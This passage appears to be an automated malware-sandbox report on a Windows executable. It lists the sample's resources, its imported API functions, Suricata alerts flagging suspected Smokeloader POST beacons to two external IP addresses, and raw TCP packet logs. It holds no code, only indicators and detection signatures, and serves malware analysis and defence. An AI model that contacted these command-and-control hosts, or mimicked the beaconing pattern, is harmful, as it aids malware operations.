RT_ICON	0x62e40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.2682572614107884
RT_ICON	0x62e40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.2682572614107884
RT_ICON	0x653e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.3074577861163227
RT_ICON	0x653e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.3074577861163227
RT_ICON	0x66490	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.3599290780141844
RT_ICON	0x66490	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.3599290780141844
RT_ICON	0x66960	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.5660980810234542
RT_ICON	0x66960	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.5660980810234542
RT_ICON	0x67808	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5464801444043321
RT_ICON	0x67808	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5464801444043321
RT_ICON	0x680b0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.6177745664739884
RT_ICON	0x680b0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.6177745664739884
RT_ICON	0x68618	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.46182572614107886
RT_ICON	0x68618	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.46182572614107886
RT_ICON	0x6abc0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4892120075046904
RT_ICON	0x6abc0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4892120075046904
RT_ICON	0x6bc68	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.494672131147541
RT_ICON	0x6bc68	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.494672131147541
RT_ICON	0x6c5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.4512411347517731
RT_ICON	0x6c5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.4512411347517731
RT_ICON	0x6cac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3784648187633262
RT_ICON	0x6cac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3784648187633262
RT_ICON	0x6d968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5058664259927798
RT_ICON	0x6d968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5058664259927798
RT_ICON	0x6e210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5599078341013825
RT_ICON	0x6e210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5599078341013825
RT_ICON	0x6e8d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.583092485549133
RT_ICON	0x6e8d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.583092485549133
RT_ICON	0x6ee40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.37053941908713695
RT_ICON	0x6ee40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.37053941908713695
RT_ICON	0x713e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.41228893058161353
RT_ICON	0x713e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.41228893058161353
RT_ICON	0x72490	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.40081967213114755
RT_ICON	0x72490	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.40081967213114755
RT_ICON	0x72e18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.46897163120567376
RT_ICON	0x72e18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.46897163120567376
RT_ICON	0x732f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.3742004264392324
RT_ICON	0x732f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.3742004264392324
RT_ICON	0x741a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5171480144404332
RT_ICON	0x741a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5171480144404332
RT_ICON	0x74a48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6059907834101382
RT_ICON	0x74a48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6059907834101382
RT_ICON	0x75110	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6596820809248555
RT_ICON	0x75110	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6596820809248555
RT_ICON	0x75678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.487551867219917
RT_ICON	0x75678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.487551867219917
RT_ICON	0x77c20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.5060975609756098
RT_ICON	0x77c20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.5060975609756098
RT_ICON	0x78cc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.4860655737704918
RT_ICON	0x78cc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.4860655737704918
RT_ICON	0x79650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.5390070921985816
RT_ICON	0x79650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.5390070921985816
RT_DIALOG	0x7dc30	0x58	data			0.8977272727272727
RT_STRING	0x7dc88	0x2c6	data	Tamil	India	0.4830985915492958
RT_STRING	0x7dc88	0x2c6	data	Tamil	Sri Lanka	0.4830985915492958
RT_STRING	0x7df50	0x6b4	data	Tamil	India	0.42657342657342656
RT_STRING	0x7df50	0x6b4	data	Tamil	Sri Lanka	0.42657342657342656
RT_STRING	0x7e608	0x242	data	Tamil	India	0.4982698961937716
RT_STRING	0x7e608	0x242	data	Tamil	Sri Lanka	0.4982698961937716
RT_STRING	0x7e850	0x620	data	Tamil	India	0.4343112244897959
RT_STRING	0x7e850	0x620	data	Tamil	Sri Lanka	0.4343112244897959
RT_STRING	0x7ee70	0x292	data	Tamil	India	0.4817629179331307
RT_STRING	0x7ee70	0x292	data	Tamil	Sri Lanka	0.4817629179331307
RT_ACCELERATOR	0x79b30	0x48	data	Tamil	India	0.8472222222222222
RT_ACCELERATOR	0x79b30	0x48	data	Tamil	Sri Lanka	0.8472222222222222
RT_GROUP_CURSOR	0x79fd8	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x7bcb8	0x30	data			0.9375
RT_GROUP_CURSOR	0x7d9a0	0x30	data			0.9375
RT_GROUP_ICON	0x6ca58	0x68	data	Tamil	India	0.7019230769230769
RT_GROUP_ICON	0x6ca58	0x68	data	Tamil	Sri Lanka	0.7019230769230769
RT_GROUP_ICON	0x668f8	0x68	data	Tamil	India	0.6826923076923077
RT_GROUP_ICON	0x668f8	0x68	data	Tamil	Sri Lanka	0.6826923076923077
RT_GROUP_ICON	0x73280	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x73280	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x79ab8	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x79ab8	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_VERSION	0x7d9d0	0x25c	data			0.5413907284768212

Imports

DLL	Import
KERNEL32.dll	InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, EnumCalendarInfoW, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, LCMapStringW, EnumCalendarInfoA, InterlockedIncrement, CommConfigDialogA, GetConsoleAliasExesA, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, CreateFileW
GDI32.dll	GetCharWidthI, CreateDCA, CreateDCW, GetCharWidth32A
ADVAPI32.dll	ReadEventLogW
ole32.dll	CoSuspendClassObjects
WINHTTP.dll	WinHttpOpen, WinHttpCheckPlatform

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-19T06:42:26.094387+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	123.213.233.131	80	TCP
2024-10-19T06:43:32.196942+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49926	123.213.233.131	80	TCP
2024-10-19T06:43:33.757079+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49933	123.213.233.131	80	TCP
2024-10-19T06:43:34.927963+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49938	123.213.233.131	80	TCP
2024-10-19T06:43:36.072375+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49945	123.213.233.131	80	TCP
2024-10-19T06:43:37.345716+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49951	123.213.233.131	80	TCP
2024-10-19T06:43:38.468886+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49957	123.213.233.131	80	TCP
2024-10-19T06:43:40.184673+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49968	123.213.233.131	80	TCP
2024-10-19T06:43:41.372727+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49978	123.213.233.131	80	TCP
2024-10-19T06:43:42.747992+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49985	123.213.233.131	80	TCP
2024-10-19T06:43:44.436982+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49996	123.213.233.131	80	TCP
2024-10-19T06:43:45.772403+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50005	123.213.233.131	80	TCP
2024-10-19T06:43:46.960849+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50012	123.213.233.131	80	TCP
2024-10-19T06:43:48.349030+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50015	123.213.233.131	80	TCP
2024-10-19T06:43:49.520871+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50016	123.213.233.131	80	TCP
2024-10-19T06:43:50.849583+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50017	123.213.233.131	80	TCP
2024-10-19T06:43:52.112051+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50018	123.213.233.131	80	TCP
2024-10-19T06:43:53.952245+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50019	123.213.233.131	80	TCP
2024-10-19T06:43:55.523729+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50020	123.213.233.131	80	TCP
2024-10-19T06:43:57.079166+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50021	123.213.233.131	80	TCP
2024-10-19T06:43:58.583452+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50022	123.213.233.131	80	TCP
2024-10-19T06:43:59.965280+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50023	123.213.233.131	80	TCP
2024-10-19T06:44:01.281772+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50024	123.213.233.131	80	TCP
2024-10-19T06:44:07.514716+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50025	123.213.233.131	80	TCP
2024-10-19T06:44:12.945954+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50026	123.213.233.131	80	TCP
2024-10-19T06:44:18.935052+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50027	123.213.233.131	80	TCP
2024-10-19T06:44:25.042915+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50028	123.213.233.131	80	TCP
2024-10-19T06:44:30.639250+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50029	123.213.233.131	80	TCP
2024-10-19T06:44:36.825190+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50030	123.213.233.131	80	TCP
2024-10-19T06:44:43.048365+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50031	123.213.233.131	80	TCP
2024-10-19T06:44:48.684367+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50032	123.213.233.131	80	TCP
2024-10-19T06:44:54.566603+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50033	123.213.233.131	80	TCP
2024-10-19T06:45:00.323082+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50034	116.58.10.60	80	TCP
2024-10-19T06:45:06.946810+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50035	116.58.10.60	80	TCP
2024-10-19T06:45:13.109708+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50036	116.58.10.60	80	TCP
2024-10-19T06:45:19.786287+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50037	116.58.10.60	80	TCP
2024-10-19T06:45:26.127378+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50038	116.58.10.60	80	TCP
2024-10-19T06:45:32.897718+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50039	116.58.10.60	80	TCP
2024-10-19T06:45:39.218290+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50040	116.58.10.60	80	TCP
2024-10-19T06:45:45.340212+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50041	116.58.10.60	80	TCP
2024-10-19T06:45:52.202083+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	61684	116.58.10.60	80	TCP
2024-10-19T06:45:58.797573+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	61685	116.58.10.60	80	TCP
2024-10-19T06:46:06.755173+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	61686	116.58.10.60	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 19, 2024 06:42:25.008912086 CEST	49736	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:42:25.013834000 CEST	80	49736	123.213.233.131	192.168.2.4
Oct 19, 2024 06:42:25.013911963 CEST	49736	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:42:25.014040947 CEST	49736	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:42:25.014059067 CEST	49736	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:42:25.018882990 CEST	80	49736	123.213.233.131	192.168.2.4
Oct 19, 2024 06:42:25.018901110 CEST	80	49736	123.213.233.131	192.168.2.4
Oct 19, 2024 06:42:26.094181061 CEST	80	49736	123.213.233.131	192.168.2.4
Oct 19, 2024 06:42:26.094387054 CEST	49736	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:42:26.095338106 CEST	49736	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:42:26.100080013 CEST	80	49736	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:31.087239027 CEST	49926	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:31.092197895 CEST	80	49926	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:31.092291117 CEST	49926	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:31.092417955 CEST	49926	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:31.092418909 CEST	49926	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:31.097275972 CEST	80	49926	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:31.097398996 CEST	80	49926	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:32.193490982 CEST	80	49926	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:32.196942091 CEST	49926	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:32.197016001 CEST	49926	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:32.201909065 CEST	80	49926	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:32.642045021 CEST	49933	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:32.647022009 CEST	80	49933	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:32.647098064 CEST	49933	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:32.647191048 CEST	49933	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:32.647219896 CEST	49933	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:32.652002096 CEST	80	49933	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:32.652129889 CEST	80	49933	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:33.752876043 CEST	80	49933	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:33.757078886 CEST	49933	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:33.759913921 CEST	49933	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:33.764802933 CEST	80	49933	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:33.785403967 CEST	49938	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:33.790388107 CEST	80	49938	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:33.790539026 CEST	49938	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:33.790662050 CEST	49938	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:33.790689945 CEST	49938	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:33.795604944 CEST	80	49938	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:33.795635939 CEST	80	49938	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:34.927907944 CEST	80	49938	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:34.927963018 CEST	49938	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:34.928177118 CEST	49938	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:34.932965040 CEST	80	49938	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:34.978681087 CEST	49945	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:34.983623028 CEST	80	49945	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:34.983702898 CEST	49945	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:34.983871937 CEST	49945	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:34.983918905 CEST	49945	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:34.988677979 CEST	80	49945	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:34.988796949 CEST	80	49945	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:36.072316885 CEST	80	49945	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:36.072375059 CEST	49945	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:36.075006008 CEST	49945	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:36.079871893 CEST	80	49945	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:36.203337908 CEST	49951	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:36.208291054 CEST	80	49951	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:36.208374977 CEST	49951	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:36.208466053 CEST	49951	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:36.208488941 CEST	49951	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:36.213242054 CEST	80	49951	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:36.213414907 CEST	80	49951	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:37.343122005 CEST	80	49951	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:37.345716000 CEST	49951	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:37.345716000 CEST	49951	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:37.350588083 CEST	80	49951	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:37.380150080 CEST	49957	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:37.385030985 CEST	80	49957	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:37.387743950 CEST	49957	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:37.387864113 CEST	49957	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:37.387881994 CEST	49957	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:37.392716885 CEST	80	49957	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:37.392843962 CEST	80	49957	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:38.468691111 CEST	80	49957	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:38.468885899 CEST	49957	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:38.468909979 CEST	49957	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:38.473787069 CEST	80	49957	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:39.074259043 CEST	49968	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:39.079283953 CEST	80	49968	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:39.079978943 CEST	49968	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:39.080082893 CEST	49968	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:39.080111027 CEST	49968	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:39.084891081 CEST	80	49968	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:39.085293055 CEST	80	49968	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:40.184614897 CEST	80	49968	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:40.184673071 CEST	49968	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:40.184731960 CEST	49968	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:40.189553022 CEST	80	49968	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:40.266233921 CEST	49978	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:40.271133900 CEST	80	49978	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:40.273139000 CEST	49978	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:40.273551941 CEST	49978	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:40.273581982 CEST	49978	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:40.278580904 CEST	80	49978	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:40.278610945 CEST	80	49978	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:41.372631073 CEST	80	49978	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:41.372726917 CEST	49978	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:41.372821093 CEST	49978	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:41.377758980 CEST	80	49978	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:41.623692989 CEST	49985	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:41.628592968 CEST	80	49985	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:41.628681898 CEST	49985	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:41.628854036 CEST	49985	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:41.628884077 CEST	49985	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:41.633668900 CEST	80	49985	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:41.633833885 CEST	80	49985	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:42.746006012 CEST	80	49985	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:42.747992039 CEST	49985	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:42.749577999 CEST	49985	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:42.754412889 CEST	80	49985	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:43.314146042 CEST	49996	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:43.319139957 CEST	80	49996	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:43.321079969 CEST	49996	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:43.321141005 CEST	49996	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:43.321171045 CEST	49996	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:43.326056957 CEST	80	49996	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:43.326107979 CEST	80	49996	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:44.434215069 CEST	80	49996	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:44.436981916 CEST	49996	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:44.440747023 CEST	49996	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:44.445622921 CEST	80	49996	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:44.686404943 CEST	50005	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:44.691359043 CEST	80	50005	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:44.691440105 CEST	50005	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:44.691551924 CEST	50005	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:44.691591978 CEST	50005	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:44.696341991 CEST	80	50005	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:44.696510077 CEST	80	50005	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:45.772242069 CEST	80	50005	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:45.772403002 CEST	50005	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:45.772403002 CEST	50005	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:45.777296066 CEST	80	50005	123.213.233.131	192.168.2.4
